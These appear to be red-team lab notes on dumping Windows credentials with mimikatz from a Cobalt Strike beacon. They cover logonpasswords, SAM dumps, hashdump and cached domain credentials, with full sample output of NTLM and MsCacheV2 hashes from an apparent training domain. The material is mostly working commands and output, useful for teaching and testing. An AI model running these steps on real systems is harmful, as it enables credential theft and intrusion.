Extract passwords for memory (ntlm if wdigest not enabled)
mimikatz sekurlsa::logonpasswords
Example:
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
Authentication Id : 0 ; 120928801 (00000000:07353a21)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 01/02/2021 04:26:49
SID : S-1-5-18
msv :
[00000003] Primary
* Username : n.lamb
* Domain : CYBER
* NTLM : 2e8a408a8aec852ef2e458b938b8c071
tspkg :
wdigest :
* Username : n.lamb
* Domain : CYBER
* Password : (null)
kerberos :
* Username : n.lamb
* Domain : CYBERBOTIC.IO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 119083790 (00000000:0719130e)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 01/02/2021 02:27:19
SID : S-1-5-18
msv :
[00000003] Primary
* Username : n.lamb
* Domain : CYBER
* NTLM : 2e8a408a8aec852ef2e458b938b8c071
tspkg :
wdigest :
* Username : n.lamb
* Domain : CYBER
* Password : (null)
kerberos :
* Username : n.lamb
* Domain : CYBERBOTIC.IO
* Password : (null)
ssp :
credman :
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts.
mimikatz token::elevate lsadump::sam
Example #1:
beacon> mimikatz lsadump::sam
[*] Tasked beacon to run mimikatz's lsadump::sam command
[+] host called home, sent: 750702 bytes
[+] received output:
Domain : WKSTN-3721
SysKey : be08d37d98bf4c887336ad0fda4cf163
Local SID : S-1-5-21-3044885426-1600074939-3914761197
SAMKey : 499d771b080645b0a04059056e182b12
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3ccc9a591f4fc162554b5aa53b0b2dcf
lm - 0: 2d85c588802929e7d3128e4bf9e312a3
lm - 1: 64d505ed3aba219d8088edd3967dcb2f
lm - 2: fad21760db14726a453e378f407ba20b
lm - 3: e7e2c92cae356e50d2361c7867668b5d
ntlm- 0: 3ccc9a591f4fc162554b5aa53b0b2dcf
ntlm- 1: 70b3ca1d0563173e87bd9b48d06af72d
ntlm- 2: e45b4697dd95e2ff83ead4b51e9df62b
ntlm- 3: e344ea8c820f91ae3212a9de26aedf92
ntlm- 4: fc525c9683e8fe067095ba2ddc971889
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
Example #2:
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ccc9a591f4fc162554b5aa53b0b2dcf:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Where domain credentials are required for logon, even whilst disconnected from the domain. The local device caches the domain credentials so authentication can happen locally
mimikatz token::elevate lsadump::cache
Example:
beacon> mimikatz lsadump::cache
[*] Tasked beacon to run mimikatz's lsadump::cache command
[+] host called home, sent: 750704 bytes
[+] received output:
Domain : WKSTN-3721
SysKey : be08d37d98bf4c887336ad0fda4cf163
Local name : WKSTN-3721 ( S-1-5-21-3044885426-1600074939-3914761197 )
Domain name : CYBER ( S-1-5-21-3865823697-1816233505-1834004910 )
Domain FQDN : cyberbotic.io
Policy subsystem is : 1.14
LSA Key(s) : 1, default {b8ea07d8-963c-032a-0732-1f246a07ee91}
[00] {b8ea07d8-963c-032a-0732-1f246a07ee91} edb7feaad803dd5332009dbf7906265a76388463c007a9ac2b4a7a94e973fe40
* Iteration is set to default (10240)
[NL$1 - 26/01/2021 14:53:28]
RID : 00000472 (1138)
User : CYBER\\r.mckenzie
MsCacheV2 : c642feecc525e3844c89b5ed0f10a8dc
[NL$2 - 24/01/2021 22:01:26]
RID : 0000046e (1134)
User : CYBER\\p.burke
MsCacheV2 : d5e65284f217d4f5b0d087e07eb7680c
[NL$3 - 03/06/2020 12:19:17]
RID : 0000046f (1135)
User : CYBER\\n.lamb
MsCacheV2 : 3c7879b370351f7a572db34ebe473b25
[NL$4 - 26/01/2021 14:50:14]
RID : 00000473 (1139)
User : CYBER\\s.owen
MsCacheV2 : db356007452a9efdb3b383b9a205f100
[NL$5 - 01/02/2021 01:42:03]
RID : 00000464 (1124)
User : CYBER\\n.glover
MsCacheV2 : 60f2e7aff0a8e4574caa53687fb3dbd5